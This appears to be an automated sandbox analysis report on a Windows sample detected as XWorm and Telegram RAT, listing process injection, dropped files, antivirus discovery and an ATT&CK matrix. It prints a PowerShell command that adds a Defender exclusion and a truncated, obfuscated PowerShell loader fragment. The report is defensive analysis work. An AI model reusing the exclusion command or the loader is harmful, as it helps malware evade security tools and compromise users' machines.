                              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WerFault.exe base: 180F6460000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WerFault.exe base: 180F6460000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WerFault.exe base: 180F6460000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WerFault.exe base: 180F6460000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WerFault.exe base: 180F6460000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WerFault.exe base: 180F6460000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WerFault.exe base: 180F6460000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WerFault.exe base: 180F6460000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\ProgramData\KrnlSetupSus.exe base: 2D50000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\ProgramData\KrnlSetupSus.exe base: 2D50000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\ProgramData\KrnlSetupSus.exe base: 2D50000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\ProgramData\KrnlSetupSus.exe base: 2D50000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\ProgramData\KrnlSetupSus.exe base: 2D50000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\ProgramData\KrnlSetupSus.exe base: 2D50000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\ProgramData\KrnlSetupSus.exe base: 2D50000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\ProgramData\KrnlSetupSus.exe base: 2D50000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\ProgramData\KrnlSetupSus.exe base: 2D50000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\ProgramData\KrnlSetupSus.exe base: 2D50000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\ProgramData\KrnlSetupSus.exe base: 2D50000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\dwm.exe base: 26DB1610000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\dwm.exe base: 26DB15C0000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2FA1C0000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 209D2570000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\dwm.exe base: 26DB1560000
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeProcess created: C:\ProgramData\Install.exe "C:\ProgramData\Install.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeProcess created: C:\ProgramData\KrnlSetupSus.exe "C:\ProgramData\KrnlSetupSus.exe" Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\KrnlSetupSus.exe'Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess created: unknown unknownJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess created: unknown unknownJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess created: unknown unknownJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{27f34893-8e1f-47b7-b44f-212b7709bf94}Jump to behavior
                              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:zdgzeizuxwrl{param([outputtype([type])][parameter(position=0)][type[]]$lbrdggfzmoojsi,[parameter(position=1)][type]$iofhbohvyv)$rbujknkpjnm=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+[char](82)+''+[char](101)+''+'f'+'l'+'e'+''+'c'+''+[char](116)+''+[char](101)+''+'d'+''+[char](68)+''+[char](101)+'l'+'e'+''+[char](103)+''+[char](97)+'t'+'e'+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+[char](73)+'nm'+'e'+'m'+[char](111)+'r'+[char](121)+''+[char](77)+''+[char](111)+''+[char](100)+''+[char](117)+''+[char](108)+''+[char](101)+'',$false).definetype(''+[char](77)+''+'y'+'de'+[char](108)+''+'e'+''+[char](103)+'a'+'t'+''+'e'+'t'+[char](121)+''+[char](112)+''+[char](101)+'','c'+[char](108)+''+[char](97)+''+'s'+''+[char](115)+''+[char](44)+''+'p'+''+[char](117)+''+'b'+'l'+[char](105)+''+'c'+''+','+''+'s'+''+'e'+'a'+'l'+''+'e'+'d'+[char](44)+''+'a'+''+'n'+''+[char](115)+'ic'+[char](108)+''+[char](97)+''+[char](115)+''+[char](115)+''+[char](44)+''+[char](65)+''+'u'+''+'t'+'o'+[char](67)+''+'l'+'a'+[char](115)+''+[char](115)+'',[multicastdelegate]);$rbujknkpjnm.defineconstructor(''+'r'+''+[char](84)+''+[char](83)+''+[char](112)+'e'+[char](99)+''+[char](105)+''+'a'+''+[char](108)+'n'+'a'+''+'m'+'e'+[char](44)+'h'+'i'+''+[char](100)+''+[char](101)+''+'b'+''+[char](121)+''+[char](83)+''+[char](105)+''+[char](103)+''+[char](44)+'p'+'u'+'b'+[char](108)+''+[char](105)+''+[char](99)+'',[reflection.callingconventions]::standard,$lbrdggfzmoojsi).setimplementationflags(''+'r'+'u'+'n'+''+[char](116)+''+[char](105)+''+[char](109)+''+[char](101)+''+','+''+[char](77)+''+[char](97)+'n'+[char](97)+''+[char](103)+'e'+'d'+'');$rbujknkpjnm.definemethod(''+[char](73)+''+[char](110)+'voke','p'+[char](117)+''+[char](98)+''+[char](108)+''+[char](105)+''+'c'+''+','+''+[char](72)+''+[char](105)+''+[char](100)+'e'+[char](66)+''+'y'+''+[char](83)+''+[char](105)+''+[char](103)+''+[char](44)+''+[char](78)+'e'+[char](119)+''+[char](83)+''+[char](108)+'o'+[char](116)+''+[char](44)+''+[char](86)+''+[char](105)+'r'+[char](116)+''+'u'+''+[char](97)+''+'l'+'',$iofhbohvyv,$lbrdggfzmoojsi).setimplementationflags(''+[char](82)+'un'+[char](116)+'ime'+','+''+[char](77)+'a'+'n'+''+[char](97)+''+'g'+''+'e'+''+[char](100)+'');write-output $rbujknkpjnm.createtype();}$ysqdxymchclna=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals('sys'+'t'+''+'e'+''+'m'+''+[char](46)+'d'+[char](108)+''+'l'+'')}).gettype('mi'+[char](99)+'r'+[char](111)+''+[char](115)+''+[char](111)+''+[char](102)+''+[char](116)+''+[char](46)+''+[char](87)+''+[char](105)+''+[char](110)+'3'+[char](50)+''+[char](46)+'u'+[char](110)+'s'+'a'+''+[char](102)+''+[char](101)+'nativ'+[char](101)+''+[char](77)+'e'+[char](116)+'h'+[char](111)+'d'+[char](115)+'');$exdfvzsyxbumyj=
                              Source: C:\Windows\System32\dllhost.exeCode function: 6_2_0000000140002390 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,6_2_0000000140002390
                              Source: C:\Windows\System32\dllhost.exeCode function: 6_2_0000000140002390 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,6_2_0000000140002390
                              Source: dwm.exe, 0000000C.00000000.1472720210.0000026DAA594000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 0000000C.00000002.2851619021.0000026DAA594000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                              Source: winlogon.exe, 00000007.00000000.1458464003.000002E991B70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000002.2802270805.000002E991B70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000C.00000000.1474064783.0000026DAAB41000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                              Source: winlogon.exe, 00000007.00000000.1458464003.000002E991B70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000002.2802270805.000002E991B70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000C.00000000.1474064783.0000026DAAB41000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                              Source: winlogon.exe, 00000007.00000000.1458464003.000002E991B70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000002.2802270805.000002E991B70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000C.00000000.1474064783.0000026DAAB41000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
                              Source: winlogon.exe, 00000007.00000000.1458464003.000002E991B70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000002.2802270805.000002E991B70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000C.00000000.1474064783.0000026DAAB41000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock

                              Language, Device and Operating System Detection

                              barindex
                              Yara detected Telegram Recon
                              Source: Yara matchFile source: C:\ProgramData\ntoskrnl.exe, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\KrnlSetupSus.exe, type: DROPPED
                              Source: C:\ProgramData\KrnlSetupSus.exeCode function: 3_2_1C5734B0 cpuid 3_2_1C5734B0
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeQueries volume information: C:\Users\user\Desktop\RdLfpZY5A9.exe VolumeInformationJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeQueries volume information: C:\ProgramData\KrnlSetupSus.exe VolumeInformationJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformation
                              Source: C:\Windows\System32\dllhost.exeCode function: 6_2_0000000140002390 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,6_2_0000000140002390
                              Source: C:\ProgramData\KrnlSetupSus.exeCode function: 3_2_1C567E50 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,3_2_1C567E50
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                              Source: KrnlSetupSus.exe, 00000003.00000002.2829186248.000000001BDD4000.00000004.00000020.00020000.00000000.sdmp, KrnlSetupSus.exe, 00000003.00000002.2829186248.000000001BD24000.00000004.00000020.00020000.00000000.sdmp, KrnlSetupSus.exe, 00000003.00000002.2842606066.000000001C8E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                              Source: dllhost.exe, Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.21.drBinary or memory string: MsMpEng.exe
                              Source: C:\ProgramData\KrnlSetupSus.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                              Stealing of Sensitive Information

                              barindex
                              Yara detected Telegram RAT
                              Source: Yara matchFile source: 0.2.RdLfpZY5A9.exe.1294ef08.2.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.RdLfpZY5A9.exe.12964350.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 3.0.KrnlSetupSus.exe.bc0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000003.00000000.1404695399.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.1406303961.0000000012938000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000003.00000002.2814408565.0000000012DF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: RdLfpZY5A9.exe PID: 7312, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: KrnlSetupSus.exe PID: 7424, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\ntoskrnl.exe, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\KrnlSetupSus.exe, type: DROPPED
                              Yara detected XWorm
                              Source: Yara matchFile source: 0.2.RdLfpZY5A9.exe.1294ef08.2.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.RdLfpZY5A9.exe.12964350.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 3.0.KrnlSetupSus.exe.bc0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000003.00000000.1404695399.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.1406303961.0000000012938000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000003.00000002.2788044587.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000003.00000002.2814408565.0000000012DF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: RdLfpZY5A9.exe PID: 7312, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: KrnlSetupSus.exe PID: 7424, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\ntoskrnl.exe, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\KrnlSetupSus.exe, type: DROPPED
                              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

                              Remote Access Functionality

                              barindex
                              Yara detected Telegram RAT
                              Source: Yara matchFile source: 0.2.RdLfpZY5A9.exe.1294ef08.2.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.RdLfpZY5A9.exe.12964350.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 3.0.KrnlSetupSus.exe.bc0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000003.00000000.1404695399.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.1406303961.0000000012938000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000003.00000002.2814408565.0000000012DF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: RdLfpZY5A9.exe PID: 7312, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: KrnlSetupSus.exe PID: 7424, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\ntoskrnl.exe, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\KrnlSetupSus.exe, type: DROPPED
                              Yara detected XWorm
                              Source: Yara matchFile source: 0.2.RdLfpZY5A9.exe.1294ef08.2.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.RdLfpZY5A9.exe.12964350.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 3.0.KrnlSetupSus.exe.bc0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000003.00000000.1404695399.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.1406303961.0000000012938000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000003.00000002.2788044587.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000003.00000002.2814408565.0000000012DF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: RdLfpZY5A9.exe PID: 7312, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: KrnlSetupSus.exe PID: 7424, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\ntoskrnl.exe, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\KrnlSetupSus.exe, type: DROPPED
                              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

                              Mitre Att&ck Matrix

                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                              Windows Management Instrumentation                              		1
                              DLL Side-Loading                              		1
                              Abuse Elevation Control Mechanism                              		11
                              Disable or Modify Tools                              		1
                              Credential API Hooking                              		1
                              System Time Discovery                              		Remote Services11
                              Archive Collected Data                              		2
                              Web Service                              		Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault Accounts11
                              Native API                              		1
                              Scheduled Task/Job                              		1
                              DLL Side-Loading                              		11
                              Deobfuscate/Decode Files or Information                              		LSASS Memory2
                              File and Directory Discovery                              		Remote Desktop Protocol1
                              Credential API Hooking                              		1
                              Ingress Tool Transfer                              		Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts12
                              Command and Scripting Interpreter                              		21
                              Registry Run Keys / Startup Folder                              		1
                              Access Token Manipulation                              		1
                              Abuse Elevation Control Mechanism                              		Security Account Manager34
                              System Information Discovery                              		SMB/Windows Admin SharesData from Network Shared Drive21
                              Encrypted Channel                              		Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal Accounts1
                              Scheduled Task/Job                              		Login Hook813
                              Process Injection                              		21
                              Obfuscated Files or Information                              		NTDS561
                              Security Software Discovery                              		Distributed Component Object ModelInput Capture1
                              Non-Standard Port                              		Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud Accounts2
                              PowerShell                              		Network Logon Script1
                              Scheduled Task/Job                              		1
                              Install Root Certificate                              		LSA Secrets2
                              Process Discovery                              		SSHKeylogging2
                              Non-Application Layer Protocol                              		Scheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts21
                              Registry Run Keys / Startup Folder                              		32
                              Software Packing                              		Cached Domain Credentials151
                              Virtualization/Sandbox Evasion                              		VNCGUI Input Capture13
                              Application Layer Protocol                              		Data Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                              DLL Side-Loading                              		DCSync1
                              Application Window Discovery                              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                              File Deletion                              		Proc Filesystem1
                              System Network Configuration Discovery                              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt4
                              Rootkit                              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron111
                              Masquerading                              		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                              Modify Registry                              		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                              Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task151
                              Virtualization/Sandbox Evasion                              		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                              Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                              Access Token Manipulation                              		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                              Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job813
                              Process Injection                              		Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood
                              Identify Business TempoBotnetHardware AdditionsPythonHypervisorProcess Injection1
                              Hidden Files and Directories                              		Credential API HookingDomain GroupsExploitation of Remote ServicesRemote Email CollectionExternal ProxyTransfer Data to Cloud AccountReflection Amplification

                              Behavior Graph

                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
